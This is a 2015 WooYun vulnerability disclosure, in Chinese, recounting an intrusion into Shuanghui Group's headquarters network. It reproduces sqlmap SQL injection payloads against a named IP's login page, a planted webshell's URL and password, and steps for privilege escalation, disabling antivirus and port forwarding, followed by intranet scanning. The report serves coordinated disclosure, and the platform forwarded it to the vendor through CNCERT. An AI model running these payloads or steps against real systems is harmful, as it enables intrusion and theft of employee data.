当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120872

漏洞标题:我是如何漫游双汇集团总部内网的(涉及大量内部资料/实时视频监控/所有员工身份证号等)

相关厂商:双汇集团

漏洞作者: 超威蓝猫

提交时间:2015-06-16 15:06

修复时间:2015-08-05 08:02

公开时间:2015-08-05 08:02

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-16: 细节已通知厂商并且等待厂商处理中
2015-06-21: 厂商已经确认,细节仅向厂商公开
2015-07-01: 细节向核心白帽子及相关领域专家公开
2015-07-11: 细节向普通白帽子公开
2015-07-21: 细节向实习白帽子公开
2015-08-05: 细节向公众公开

简要描述:

荣获「食品安全终生成就奖」的企业对信息安全一点也不重视啊 ._.

详细说明:

早在今年一月,就有人报告了「双汇集团考勤管理系统未授权访问」这一漏洞(http://wooyun.org/bugs/wooyun-2010-094664),泄漏员工姓名与身份证号。这个漏洞依然没有修复,同时这也是本次入侵双汇集团位于河南漯河总部的入口。
wooyun-2010-094664 中提到,考勤管理系统登录页面 http://221.176.224.234/ 存在SQL注射:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: TextBox1 (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTc2OTQ2OTM4MQ9kFgICAw9kFgQCCQ8QDxYEHg1EYXRhVGV4dEZpZWxkBQJzah4LXyFEYXRhQm91bmRnZBAVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkUKwM0Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAg0PPCsADQEADxYEHwFnHgtfIUl0ZW1Db3VudGZkZBgBBQlHcmlkVmlldzEPPCsACgEIZmSl3KpxbOgbM+nQ2IVReHAz9RY4UA==&TextBox1=a' AND 9450=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9450=9450) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'Ankx'='Ankx&TextBox2=6/5/2015&DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9%E6%9C%88%E4%BB%BD&Button2=%E6%9F%A5%E8%AF%A2
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTc2OTQ2OTM4MQ9kFgICAw9kFgQCCQ8QDxYEHg1EYXRhVGV4dEZpZWxkBQJzah4LXyFEYXRhQm91bmRnZBAVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkUKwM0Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAg0PPCsADQEADxYEHwFnHgtfIUl0ZW1Db3VudGZkZBgBBQlHcmlkVmlldzEPPCsACgEIZmSl3KpxbOgbM+nQ2IVReHAz9RY4UA==&TextBox1=a'; WAITFOR DELAY '0:0:5'--&TextBox2=6/5/2015&DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9%E6%9C%88%E4%BB%BD&Button2=%E6%9F%A5%E8%AF%A2
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTc2OTQ2OTM4MQ9kFgICAw9kFgQCCQ8QDxYEHg1EYXRhVGV4dEZpZWxkBQJzah4LXyFEYXRhQm91bmRnZBAVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkUKwM0Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAg0PPCsADQEADxYEHwFnHgtfIUl0ZW1Db3VudGZkZBgBBQlHcmlkVmlldzEPPCsACgEIZmSl3KpxbOgbM+nQ2IVReHAz9RY4UA==&TextBox1=a' WAITFOR DELAY '0:0:5'--&TextBox2=6/5/2015&DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9%E6%9C%88%E4%BB%BD&Button2=%E6%9F%A5%E8%AF%A2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current user is DBA:    True
available databases [7]:
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] sygs
[*] sygsaa
[*] tempdb


找到物理路径之后写入webshell:

sshot-2015-06-16-[2].png


得到:http://221.176.224.234/indexbak.aspx 密码-7
这台服务器上有功能残缺的360,但ms11-080和ms11-046等漏洞未修补,可提权。提权后干掉直接360(360在win2003表现不怎样),lcx反射端口,连接远程桌面。

sshot-2015-06-16-[3].png


sshot-2015-06-16-[4].png


扫描下常用端口

mask 区域 
*****.0.1*****
*****.0.7*****
*****.0.1*****
*****.100:*****
*****.100:*****
*****.101:*****
*****.102:*****
*****.103:*****
*****.166:*****
*****.180:*****
*****.181:*****
*****.181:*****
*****.182:*****
*****.185:*****
*****.185:*****
*****.182:*****
*****.186:*****
*****.186:*****
*****.184:*****
*****.184:*****
*****.183:*****
*****.183:*****
*****.210:*****
*****.210:*****
*****.210:*****
*****.210:*****
*****.245:*****
*****.245:*****
*****.245:*****
*****.249:*****
*****.249:*****
*****.247:*****
*****.247:*****
*****.0.2*****


大致摸清了双汇总部内网结构:

sshot-2015-06-16-[6].png


sshot-2015-06-16-[5].png


sshot-2015-06-16-[7].png


sshot-2015-06-16-[8].png


共享文件太多了,屏幕太小截一部分吧

sshot-2015-06-16-[9].png

漏洞证明:

如上。

修复方案:

sshot-2015-06-16-[1].png

版权声明:转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-06-21 08:00

厂商回复:

cnvd确认并复现所述情况,已经由cnvd通过网站管理单位公开联系渠道向其邮件通报。

最新状态:

暂无